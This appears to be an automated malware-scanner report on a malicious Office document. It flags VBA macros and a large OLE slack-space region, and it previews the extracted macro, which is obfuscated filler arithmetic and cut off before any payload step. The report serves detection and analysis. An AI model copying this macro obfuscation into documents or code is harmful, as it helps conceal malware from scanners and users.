Verdict: MALICIOUS
Risk score: 62

Malware Insights
MITRE ATT&CK: T1059.005 (Command and Scripting Interpreter: Visual Basic)
The presence of VBA macros and the OLE slack space anomaly indicate a malicious document. The obfuscated VBA code strongly suggests it is designed to download and execute a second-stage payload, though the specific URL or execution method is not directly discernible due to the obfuscation. The embedded URL is benign.
Heuristics (3)
- OLE document has large unaccounted-for region [severity: high, OLE_SLACK_ANOMALY]: OLE file is 108,444 bytes but its declared streams total only 57,435 bytes; 51,009 bytes (47%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
- VBA macros detected [severity: medium, OLE_VBA_MACROS]: Document contains VBA macro code.
- Embedded URL [severity: info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body).
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4940 bytes | 07168c26c8e8e140d1240af4c9c8178f5a9104551f73d5023b368425191583c4 |

Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "KfVvvOMj"
Private Function zRFtwLHaz()
On Error Resume Next
wtIzFM = 64115 + vSErW * cnOJva + 91536 / MwsYi - wAhHv / 57645 * 95603 * 62440 / dUrjvz
ckYuu = zazTjF / cXDWM / 16403 * AjbwP + 34005 / NRPYw + (FwmKBL / zLPiKj - wPZoj - rOwIc / dElJhu - YzfktV)
OLYQui = 36714 + wrYhJE * hjWvlw + 92015 / uvHlpE - zbhPdN / 12313 * 69472 * 3369 / OOzmY
BJnoCa = 79074 + zrKSLl * GvsitJ + 94278 / Qwana - DQOtw / 74806 * 12157 * 64951 / sitcp
YnKCZ = 4343 + mTSiUm * dpErwA + 89175 / TawUZX - wGVwmN / 4030 * 87694 * 78594 / ZmdKvc
End Function
Private Function oQsmjwawrbp()
On Error Resume Next
iAozL = cFVTGw / jJsLrU / 50914 * QsCGU + 89854 / OXvsor + (YcWDOv / oDdfnl - Uajzt - NHlqqi / qwYOIF - kQooFi)
VTpFIw = CAprtv / oPjXkt / 44286 * aHpbZJ + 53963 / oKXAl + (iMCwtH / vCaAo - EUlCD - YthPj / RaoAh - uEqkW)
GovMhq = FJhWkh / cDDFqS / 21808 * iisPf + 5322 / wRmpNi + (FjBifO / MKCJWE - vQzzT - GRUSKu / KPkuT - fwTEIn)
oYbhIa = wOsush / qjMjM / 11110 * fPWhAi + 8059 / stOflT + (PJZIw / JVNND - aHbZS - mJJEz / rpKWz - MwzdQC)
qAihWi = LChoYK / RifSi / 9195 * ajPqw + 62365 / nSFEGi + (fGLwS / PmiENV - ITLIHZ - QUOrY / JXjck - cMlYT)
InVuJ = zPiiQ / wRwJD / 20921 * RRHrn + 41846 / AGVwqZ + (PFznP / fKcLfG - jvznaG - pmBviY / Tquhnq - hLzWn)
End Function
Private Function iUIDnztcLkzAH()
On Error Resume Next
rtzdfD = 68366 + SomMn * CVhpKG + 16871 / mFXrk - WKKXN / 15933 * 7689 * 40797 / DMkvE
QwmqCB = 65811 + MUKiW * lZPbA + 76711 / bWljON - jXlLqM / 66094 * 51272 * 77102 / VEvIi
nTAKAV = 98468 + RDWDl * ifWziY + 37209 / zzZaG - GdQuh / 98853 * 93745 * 38543 / qSLnH
AlGlI = 28529 + LzBip * sFnSi + 87876 / iPwfm - GidZLE / 22959 * 45246 * 9493 / lzwHtz
dONWz = 46933 + QKhkl * awaImi + 44877 / adknSB - hmOfo / 75178 * 3210 * 46165 / kjEHv
End Function
Private Function PiiEPbkAXsDITl()
On Error Resume Next
pjolwC = imYUw / chjOE / 55865 * mJaIzY + 39948 / zkToK + (HhtYfc / SPXXkN - lMRMFs - jJjlZ / pjBEfl - UzqpYA)
tCkOL = jlSHj / UbYNn / 12362 * zmNSrw + 44157 / lWcnEt + (mGvWOJ / vjzwT - tadCS - Bjfkt / owzOq - fYjoS)
zzWWb = auVEFj / TwQOD / 9 * OcAFpR + 5452 / zYCJrm + (ZwRXiH / jKVAjE - muQlXp - wRhJd / zzBvsh - YSwfRi)
slqri = vfAhL / ZVwsHH / 43280 * GZMJj + 84973 / RvpFIL + (aUKoBP / lnPlVR - jjYhvQ - SZhLm / ijLcCh - vdhSGH)
End Function
Private Function dTmAsLVWqbUd(mcChsEmnHArif)
On Error Resume Next
TKKnWw = (59171 + QKzZin / USbDPZ + hitAQO / 39566 / QjFbUV) / 32698 + fNiMC + GQEZLO * 72834
KbhkP = (32176 + NubHv / dOYTBb + jodCCw / 11616 / oMofbK) / 2802 + JtTuD + nMniEp * 83629
Lmdbt = (40576 + QNXuNT / SGDww + kNizcd / 93603 / DGICvl) / 30032 + rpcKfO + fpswwG * 8778
wiwHj = (99108 + YpMGO / ShrkPN + mJWOw / 14500 / jzkwvS) / 72309 + DRaLpL + qBrQwa * 28806
End Function
Private Function iaFwDGZsLNOEiR()
On Error Resume Next
YpMNO = (1686 + lYpPNw / QiczmS + GJncmL / 73443 / honzKL) / 3570 + qjXrnv + dTEvco * 81958
QURfY = (70134 + oKurAb / ohOmm + PbCLV / 18225 / iQJBq) / 54273 + jpuWW + HijtD * 76511
YzQTM = (23861 + qGAjWm / GhmLR + bzJIXt / 67720 / AaDZQ) / 45805 + SBdWRA + zJPoZ * 98077
SOfRq = (39540 + tklWzi / vHiFTH + FBDajT / 83472 / zRQRw) / 67269 + bDFKzL + SjaJQ * 35149
WEAcwZ = (78771 + vTdHq / zKGOan + JpAfNA / 99631 / iUkrHD) / 97315 + nYTdt + DosXTL * 9203
End Function
Private Function lTjmvuXZitj()
On Error Resume Next
RoWwZ = (66523 + WIRtiB / aLVjvV + WiWNb / 91120 / ZllCH) / 45005 + WFzOU + SrvKP * 41530
jnCjN = (5741 + GzlwnM / WjqXid + GYSaA / 7125 / mMzFdB) / 80773 + jStUWP + LPhIV * 39061
RhAhNV = (65497 + PsZwFY / zrDWZ + wiWvZ / 6364 / utjCA) / 59897 + Wqijb + iFlnk * 94070
EpisTC = (16921 + GZpCA / LkQMj + biHkca / 56201 / ThDqL) / 93369 + mYUdMj + fuqju * 50689
rsqDm = (53177 + wdloS / zWLWv + HwIMUv / 40169 / qziKcw) / 77368 + ApzND + XNsvJj * 60723
End Function
Private Function zVfoMjIYQjYFO()
On Error Resume Next
pwLwV = (54399 + AjHfrP / XAYXTO + ikwunA / 93228 / QNYCou) / 10658 + BHwcZr + UlpitI * 81499
jQ ... (truncated)
```